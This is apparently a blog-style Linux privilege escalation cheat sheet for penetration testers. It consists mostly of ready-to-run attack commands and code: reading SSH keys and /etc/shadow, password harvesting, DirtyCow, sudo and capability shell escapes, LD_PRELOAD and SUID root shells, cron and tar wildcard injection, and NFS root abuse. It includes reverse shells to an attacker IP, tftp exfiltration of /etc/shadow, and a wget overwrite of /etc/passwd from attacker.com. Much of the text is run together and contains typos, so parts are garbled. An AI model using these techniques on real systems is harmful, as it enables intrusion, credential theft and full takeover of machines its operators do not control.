Linux Privilege Escalation Checklist
User Home Directory Enumeration
By User RSA Key
$ cat .ssh/id_rsa
$ vim id_rsa_bee
$ chmod 600 id_rsa_bee
$ ssh -i id_rsa_bee root@192.168.1.61
By User History
$ cat .mysql_history
$ cat .bash_history
Some Softwares Example for Privilege Escalation
Mozilla Firefox User Data Folder
Look for data in the firefox default folder.
$ cd ./mozilla/firefox
FIREFOX DECRYPT is a tool for extracting passwords from profiles of Mozilla (Fire/Water)fox™, Thunderbird®, SeaMonkey® and derivatives.
DUMPZILLA Official Site: [http://www.dumpzilla.org/] “Mozilla browser forensic tool” has as purpose extract all forensic interesting information of Firefox, Iceweasel and Seamonkey browsers to be analyzed.
Google Chrome User Data Folder
$ cd ./config/google-chrome/
Location of Filezilla.xml
$ cd ./config/filezilla
Putty — SSH Client
$ cd .putty/
$ cd .putty/sessions/
Thunderbird User Data Location
$ cd .thunderbird/
$ cd .mozilla-thunderbird/
$ USE FIREFOX DECRYPT OR DUMPZILLA
User Details
$ id
$ sudo -l
$ who -a
$ w
$ cat /etc/passwd
$ cat /etc/shadow
Operating System
$ hostname$ uname
> uname -a
> Linux kali 5.10.0-kali2-amd64 1 SMP Debian 5.10.9-1kali1 (2021-01-22) x86_64 GNU/Linux
> Linux - Kernel Name. If you run the same command on BSD or MacOS, the result will be different
> kali - hostname
> 5.10.0-kali2-amd64 - Kernel Release
> SMP Debian 5.10.9-1kali1 - Debian SMP Compilation
> x86_64 - Machine / Processor/ OS Architecture
> GNU/Linux - Operating System
> uname -r - Kernel Name
> uname -mrs
> uname -a | awk ‘{print $3}’ | cut -d ‘-’ -f 1 - Kernel Name$ cat /proc/version$ cat /etc/issue$ cat /etc/*-release$ cat /etc/lsb-release$ cat /etc/redhat-release$ rpm -q kernel$ rpm -qa | grep kernel$ dpkg -l | grep kernel$ dmesg | grep Linux$ ls /boot | grep vmlinuz-$ ls /etc/ | grep release$ lscpu - CPU Details
Kernel Exploit
$ searchsploit "Linux Kernel"$ curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '
CVE-2016–5195 (DirtyCow)
$ Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c$ https://github.com/FireFart/dirtycow/blob/master/dirty.c$ https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs$ https://dirtycow.ninja/$ curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '
Application and Service Details
What applications are installed?? What version are they?? Are they currently running??
$ ls -alh /usr/bin$ ls -alh /bin$ ls -alh /usr/sbin$ ls -alh /sbin$ ls -alh /usr/local/bin$ ls -alh /usr/local/sbin$ dpkg -l$ rpm -qa$ ls -lha /var/cache/apr/archives/$ ls -lha /var/cache/yum/*$ ls -lha /var/cache/yum/x86_64/7/*$ rpm -qa | grep ftp$ rpm -qi ftp-0.17-67.el7.x86_64$ ps -aux$ ps -aux | grep root$ ps -aux | grep -v root$ pstree$ ps -ef$ ps -ef | grep root$ ps -ef | grep -v root
Check Running Services in System V (SysV) init System
$ service --status-all$ service --status-all | less$ service apache2 status$ systemctl status apache2.service$ systemctl$ systemctl list-units --type=service$ systemctl --type=service$ systemctl list-units --type=service --state=running$ systemctl --type=service --state=running$ systemctl | grep running$ running_services$ chkconfig --list$ chkconfig --list | grep 3:on$ chkconfig httpd on$ chkconfig httpd off$ initctl list
SUID Escalation
> Shared Object Injection
> Binary Symlinks
> Systemctl — SUID Binary
$ Locate .service
Capabilities
List of capabilities of binaries
$ /usr/bin/ping$ /usr/bin/dumpcap$ /usr/bin/gnome-keyring-daemon$ /usr/bin/rlogin$ /usr/bin/fping$ /usr/bin/rsh$ /usr/bin/rcp$ getcap -r /usr/bin/$ getcap /usr/bin/ping$ getcap -r /usr/sbin$ setcap cap_net_raw+p /usr/bin/rcp$ cap_net_bind_service+ep$ setcap cap_net_bind_service+ep /usr/bin/ping$ https://guif.re# GTFO Bins$ setcap cap_setuid+ep /usr/bin/php7.3$ setcap cap_setuid+ep /usr/bin/python2.7$ setcap cap_setuid+ep /usr/bin/gdb > /usr/sbin/getcap -r / 2>/dev/null > /usr/bin/getcap /usr/bin/php7.3 > CMD="/bin/sh" > /usr/bin/php7.3 -r “posix_setuid(0); system('CMD');”$ /usr/bin/getcap /usr/bin/python2.7 > /usr/bin/python2.7 -c ‘import os; os.setuid(0); os.system("/bin/sh")’$ /usr/bin/getcap /usr/bin/gdb > /usr/bin/gdb -nx -ex ‘python import os; os.setuid(0)’ -ex ‘!sh’ -ex quit
PATH Variable (PATH Abusing)
Environmental:
Display current $PATH
Displays env information:
$ echo $PATH
> strings /usr/bin/user_hello$ vim ~/.bashrc
Exporting PATH:
$ export $PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin$ export $PATH=/tmp:$PATH
Custom Binary:
Set bin PATH$ yum install gibc-devel$ cd /usr/src$ wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.9.tgz$ sudo tar xzf shc-3.8.9.tgz$ cd shc-3.8.9$ make$ make install$ vim user_hello.sh
Another Custom Binary:
#!/bin/bash
echo “Hello”
whoami
shc -T -f user_hello.sh
mv user_hello.sh.x user_hello
./user_hello
strings /usr/bin/user_hello
whoami
vim user_hello.c
Another Custom Binary to get root :
int main (void){setresuid (0, 0, 0);system("/bin/sh");} ORint main(void) {setgid(0); setuid(0);execl("/bin/sh","sh",0);}
Last Edited Files :
find / -mmin -10 2>/dev/null | grep -Ev “*/proc”
Cron Jobs & Systemd Timers :
Cron Jobs :
vim /etc/crontabSHELL=/bin/shPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binExample of job definition:.---------------- minute (0 - 59)| .------------- hour (0 - 23)| | .---------- day of month (1 - 31)| | | .------- month (1 - 12) OR jan,feb,mar,apr ...| | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat| | | | |* * * * * user-name command to be executed17 * * * * root cd / && run-parts --report /etc/cron.hourly25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )***********Field - Command Allowed ValuesMinute - 0 - 59Hour - 0 - 23Day of Month - 1 - 31Month - 1 - 12Day of Week - 1 - 7To run any command - Any Command
For Example :
- 10 * * * rm -rf /tmp/* — any 10 Hour
- 10 10 * * * rm -rf /tmp/* — any 10 hour 10 min
- * * * * * rm -rf /tmp/* — at every minute
- 5 * * * * rm -rf /tmp/* — at every 5th minute
crontab -ecrontab -lcrontab -l -u rootcrontab -e -u usercrontab -l -u usercat /var/log/croncrontab -r/etc/cron.daily//etc/cron.hourly//etc/cron.monthly//etc/cron.weekly/cd /etc/cron.d/cat clamav updateMAILTO=root2 * * * * root /usr/share/vim /etc/crontab/usr/bin/tar -cvf /backup/armour/'date + %F'.tar /home/user/* * * * * armour /usr/bin/tar -cvf /backup/user
https://crontab.guru/ — The quick and simple editor for cron schedule expressions by Cronitor .
crontab -lls -lah /var/spool/cron;ls -al /etc/ | grep cronls -al /etc/cron*cat /etc/at.allowcat /etc/at.denycat /etc/cron.allowcat /etc/cron.deny*ls -lh /etc/ | grep cron
Bad File Permissions :
Cron Jobs Files Location :
/etc/init.d/etc/cron*/etc/crontab/etc/cron.allow/etc/cron.d/etc/cron.deny/etc/cron.daily/etc/cron.hourly/etc/cron.monthly/etc/sudoers/etc/cron.weekly/etc/exports/etc/anacrontab/var/spool/cron/var/spool/cron/crontabs/rootvim /etc/crontab
Cron (File Overwrite) :
* * * * * root /opt/my_script.sh$ echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ >> /opt/my_script.sh $/tmp/bash -p $id$ echo “chmod 777 /etc/passwd” >> /opt/my_script.sh
Cron (Permissions) :
ls -l /etc/ | grep crondrwxrwxrwx 2 root root 4096 Feb 15 11:43 cron.ddrwxr-xr-x 2 root root 4096 Feb 10 19:37 cron.dailydrwxr-xr-x 2 root root 4096 Feb 10 19:37 cron.hourlydrwxr-xr-x 2 root root 4096 Feb 10 19:37 cron.monthly-rw-r--r-- 1 root root 1149 Nov 1 00:06 crontabdrwxr-xr-x 2 root root 4096 Feb 10 19:37 cron.weekly ANDdebian@debian /etc/cron.d ls -lhtotal 8.0K-rw-r--r-- 1 root root 751 Feb 15 11:46 php-rwxrwxrwx 1 root root 49 Feb 15 11:43 rootme
Cron (Wildcards) :
cat /opt/my_backup.sh#!/bin/shcd /home/user/tar czf /backup/user/1.tar.gz ** * * * * root /usr/bin/tar czf /backup/user/'date “+\%F-\%H-\%M”' .tar.gz /home/user/*cd /home/user/lsecho “chmod u+s /usr/bin/find” > demo1.shecho “” > “--checkpoint-action=exec=sh demo1.sh”echo “” > --checkpoint=1ls -al /usr/bin/findtouch demo/usr/bin/find . -exec /bin/sh -p 'c -quit* * * * * root /usr/bin/bash /script/*.sh
SUDO (Shell Escape Sequences and Abusing Intended) :
Sudovisudoroot ALL=(ALL)ALLThe first ALL keyword indicates that this rule applies to all hostsThe second ALL indicates that the user in the first column can run commands with the privileges of any user.The third ALL means any command can be run.
vim /etc/sudoerscat /etc/group | grep wheelssh a1@IP_Addsudo -lgpasswd -a a1 wheelcat /etc/group | grep wheelfdisk -lgpasswd wheelidgroupssg - wheelusermod -G sudo usergroups usersudo EDITOR=vim visudom1 ALL=(armour) /usr/bin/touch,/usr/bin/mkdir, /usr/bin/cdsudo --user=armour mkdir /home/user/d2sudo EDITOR=vim visudoCmnd_Alias USER_CMND=/usr/sbin/fdisk, /usr/sbin/ifconfig, /usr/bin/nslookup, /usr/sbin/useradd, /usr/bin/usermodm1 ALL=(root.armour) USER_CMNDsudo -luseradd n1sudo --user=user useradd n1sudo --user=root useradd n1sudo useradd n2sudo EDITOR=vim visudoCmnd_Alias M2_CMND=/usr/bin/cd, /usr/bin/mkdir, /usr/bin/vim, /usr/bin/cp, /usr/bin/mvm2 ALL=(ALL) M2_CMNDssh m2@ipgroupssudo -lsudo --user=user vim /home/user/a1sudo --user=m1 cp /etc/passwd /home/m1Without a Passwordsudo EDITOR=vim visudom1 ALL=(root,user) NOPASSWD:USER_CMNDsudo EDITOR=vim visudo%grp ALL=(ALL) M2_CMNDCmnd_Alias USER_CMND=/sbin/fdisk,/bin/su,/sbin/ifconfig,/usr/bin/apt, /usr/bin/dpkg, /bin/umountSudoers file Syntax:root ALL=(ALL:ALL)ALLroot ALL=(ALL)ALLroot ALL=(root)ALL[user][host]=[(user:group)][commands]username = roothost(Terminal) = ALLrun as (user:group) = (ALL:ALL)commands = ALLExample: user ALL=(ALL:ALL) ALLuser ALL=(ALL:ALL) USER_CMNDroot ALL = (ALL:ALL) ALLuser ALL = (ALL:ALL) NOPASSWD:ALL%IT ALL = (ALL) NOPASSWD:/bin/mkdir, PASSWD:/bin/rm%www-data ALL = (ALL:ALL) NOPASSWD:/usr/sbin/service apache2 *bla ALL = (bla1) /usr/bin/scpbla1 ALL = (ck-00) NOPASSWD : /bin/rbashck-00 ALL = NOPASSWD : /bin/ddmaria ALL = (root) NOPASSWD:./usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/visudo -l
Sudo (LD_Preload) :
sudo -l
Matching Defaults entries for user on this host
env_keep+=LD_PRELOAD
vim /tmp/env.c
#include <stdio.h>#include <sys/types.h>#include <stdlib.h>void_init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash");}
gcc -fPIC -shared -o /tmp/emp.so /tmp/env.c -nostartfiles
sudo LD_PRELOAD=/tmp/env.so apache2
OR
sudo LD_PRELOAD=/tmp/env.so httpd
Spawn Root Access :
sudo -l Know sudo rights for the current user can executesudo -isudo -s
susudo su -sudo su
bashsudo /bin/bashsudo bash -sudo /bin/bash -l
shsudo /bin/shsudo sh -lsudo /bin/sh -l
ashsudo /bin/ashsudo ash -sudo /bin/ash -lcshsudo /bin/cshsudo csh -lsudo /bin/csh -lzshsudo /bin/zshsudo zsh -lsudo /bin/zsh -lawksudo awk ‘BEGIN {system("/bin/bash")}’ Spawn shell using AWK one-linersudo awk ‘BEGIN {system("/bin/sh")}’sudo awk ‘BEGIN {system("bash")}’tcpdumpCOMMAND='id'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z rootecho 'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/testchmod +x /tmp/testsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell -Z rootcd /tmpecho "nc -e /bin/bash $IP 4455" > shellchmod 777 shellsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell -Z rootfindsudo find /home -exec /bin/bash \;sudo find /home -exec bash \;sudo find /home -exec /bin/sh \;sudo find /home -exec sh \;perlsudo perl -e 'exec "/bin/sh";'sudo perl -e 'exec "/bin/bash";'sudo /usr/bin/perl -e 'exec "/bin/sh";'sudo /usr/bin/perl -e 'exec "/bin/bash";'ftpsudo ftp!/bin/shsudo /usr/bin/ftp!/bin/bashpythonsudo python -c 'import pty; pty.spawn("/bin/sh")'sudo python3 -c 'import pty; pty.spawn("/bin/sh")'./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'rootme.py#!/usr/bin/env pythonimport ptypty.spawn("/bin/bash")rootme1.py#!/usr/bin/env pythonimport osos.system("/bin/bash")rootme2.py#!/usr/bin/env pythonimport osos.execl("/bin/sh", "sh", "-p")rootme3.py#!/usr/bin/env pythonimport osos.setuid(0)os.system("/bin/sh")python scriptsudo /bin/script/shell.py!/usr/bin/pythonimport osos.system("/bin/bash")os.system('cp /bin/sh /tmp/sh')os.system('chmod u+s /tmp/sh')lesssudo less /etc/profile!/bin/shsudo less /etc/hosts!/bin/shsudo /usr/bin/less /etc/passwd!/bin/shSame with More - /var/log/messagesshell scriptsudo /bin/script/shell.sh!/bin/bash/bin/bashmv script.sh script.sh.bakecho "/bin/bash" > script.shchmod 777 getlogs.shsudo script.shmansudo /usr/bin/man /etc/passwd!/bin/bashsudo man man!/bin/shcapshsudo capsh /bin/bash --tftpsend sensitive files to serversudo -E tftp AttackerIPput /etc/shadowtimesudo /usr/bin/time /bin/shsudo time /bin/bashtimeoutsudo timeout --foreground 7d /bin/shulLFILE=file_to_readsudo ul "$LFILE"unexpandLFILE=file_to_readsudo unexpand -t99999999 "$LFILE"unsharesudo unshare /bin/shwatchsudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'wgetAttacker Machinecreate a passwd file with root user entrystart a web serverVulnerable MachineURL=http://attacker.com/file_to_getLFILE=file_to_savesudo wget $URL -O $LFILE"sudo wget AttackerIP/PORT/passwd -O /etc/passwd"xargssudo xargs -a /dev/null shxxdfile readsudo xxd /etc/shadow | xxd -rnmapMethod 1TF=$(mktemp)echo 'os.execute("/bin/sh")' > $TFnmap --script=$TFMethod 2nmap --interactivenmap> !shsetcapusing setcap we can set capability to setuid to any languagepythoncp which pythonsudo setcap cap_setuid+ep python./python -c 'import os; os.setuid(0); os.system("/bin/sh")'phpcp $(which php) .sudo setcap cap_setuid+ep phpCMD="/bin/sh"./php -r "posix_setuid(0); system('$CMD');perlcp $(which perl) .sudo setcap cap_setuid+ep perl./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'rubycp $(which ruby) .sudo setcap cap_setuid+ep ruby./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
https://gtfobins.gituhb.io/ — Use this for suid and sudo privileges.
Password Mining :
There are several softwares which save passwords in their directory in PC and which can be found and cracked. Some of which softwares are :
> Brave • Chromium • Dissenter-Browser • Google Chrome • IceCat • Firefox • Opera • Slimjet • Vivaldi • Waterfox • Pidgin • Psi • DBVisualizer • Squirrel • SQLdeveloper • Clawsmail • Thunderbird • System Password • Apache Directory Studio • AWS • Docker • Environment Variable • Filezilla • gFTP • History Files • Shares • SSH Private Keys • Keepass Configuration Files • Dashlane • Grub • Network Manager • WPA Supplicant • GNOME Keyring • Kwallet • Hashdump • .htaccess — htpasswd /etc/apache2/htpass 1600 | Apache $apr1$ MD5, md5apr1, MD5(APR)
The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
https://github.com/AlessandroZ/LaZagne
History :
cat ~/.bash_historycat ~/.mysql_historycat ~/.nano_historycat ~/.atftp_historycat ~/.viminfocat ~/.php_history
Configuration Files :
Some of the common configuration files are :
> .htaccess htpasswd /etc/apache2/htpass 1600 | Apache $apr1$ MD5, md5apr1, MD5(APR)
• config.inc.php
• wp-config.php
• db-config.pho
• dbconnect.php
• cat /var/mail/armour
• cat /var/mail/root
• cat /var/spool/mail/armour
• cat /var/spool/mail/root
Commands to find configuration files are :
find / -type f -name httpd.conf 2>/dev/nullfind / -type f -name access_log 2>/dev/nullfind / -type f -name *.log 2>/dev/nullfind / -type f -name error_log 2>/dev/nullfind / -type f -name config.inc.php 2>/dev/nullfind / -type f -name .htpasswd 2>/dev/nullfind / -type f -name .bash_history 2>/dev/nullfind / -type f -name .mysql_history 2>/dev/nullfind / -type f -name service.pwd 2>/dev/nullfind / -type f -name “config*” 2>/dev/null
Listing File Permissions :
These are common commands to find files and directories on the system which can help you with privilege escalation :
sudo -lfind / -perm 777find / -perm 777 2>/dev/nullfind / -perm 777 -type f 2>/dev/null - find files with rwx and sticky bits(t)find / -perm 777 -type d 2>/dev/nullfind / -perm 1777 -type d 2>/dev/nullfind / -perm -o=w -type f 2>/dev/nullfind / -perm -o=wrx -type f 2>/dev/nullfind / -perm -o=wr -type f 2>/dev/nullfind / -perm -o=w -type d 2>/dev/nullfind / -perm -o=wrx -type d 2>/dev/nullfind / -perm -o=wr -type d 2>/dev/nullfind / -writable -type d 2>/dev/nullfind / -writable -type f 2>/dev/nullfind / -readable -type d 2>/dev/nullfind / -readable -type f 2>/dev/nullfind / -type f -name httpd.conf 2>/dev/null
Writeable Location for all :
These are the location in which you have read and write permissions irrespective of the user/shell you have :
/tmp/var/tmp/dev/shm
SUID & SGID Files & Directories :
These are commands to find SUID & SGID Files and Directories in the system which are benificial for privilege escalation :
find / -type f -perm -u=rws 2>/dev/nullfind / -type f -perm 777 2>/dev/nullfind / -type f -perm -04000 2>/dev/nullfind / -type d -perm -g=rws 2>/dev/nullfind / -type d -perm -g=rwS 2>/dev/nullfind / -type d -perm -06000 2>/dev/null
NFS Root Squashing :
Read the /etc/exports file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.
no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
no_all_squash: This is similar to no_root_squash option but applies to non-root users. Imagine, you have a shell as nobody user; checked /etc/exports file; no_all_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user.
From the output, notice that “no_root_squash” option is defined for the “/tmp” export.
Mounting that directory in a client machine, and as root copying inside the mounted folder the /bin/bash binary and giving it SUID rights, and executing from the victim machine that bash binary.
showmount -e 192.168.1.52mkdir /tmp/1mount -t nfs 192.168.1.52:/tmp/ /tmp/1//tmp/1/rootme.crootme.c
int main(){ setgid(0); setuid(0); system("/bin/bash"); return 0;} OR
int main (void){ setresuid (0,0,0); system("/bin/sh");}gcc /tmp/1/x.c -o /tmp/1/xchmod +s /tmp/1/x/tmp/xidmkdir /tmp/nfsdirmount -t nfs 192.168.1.52:/tmp /tmp/nfsdircd /tmp/nfsdircp /bin/bash . #copy wanted shellchmod +s bash #set suid permission
Tools & Links :
Here at last we have the links to some automated tools and links which can help in privilege escalation :
Tools :
LinPeas - Linux Privilege Escalation Awesome Script - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEASLinEnum - https://github.com/rebootuser/LinEnumLES : Linux Privilege Escalation Auditing Tool - https://github.com/mzet-/linux-exploit-suggesterlinuxprivchecker.py - https://github.com/sleventyeleven/linuxprivchecker
Links :
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://github.com/swisskyrepo/PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md https://payatu.com/guide-linux-privilege-escalation https://gtfobins.github.io/https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html https://book.hacktricks.xyz/linux-unix/privilege-escalation https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklisthttps://payatu.com/guide-linux-privilege-escalation
Congratulations…. You are ROOT now….. ;-)
For any queries contact on my twitter and linkedin profiles -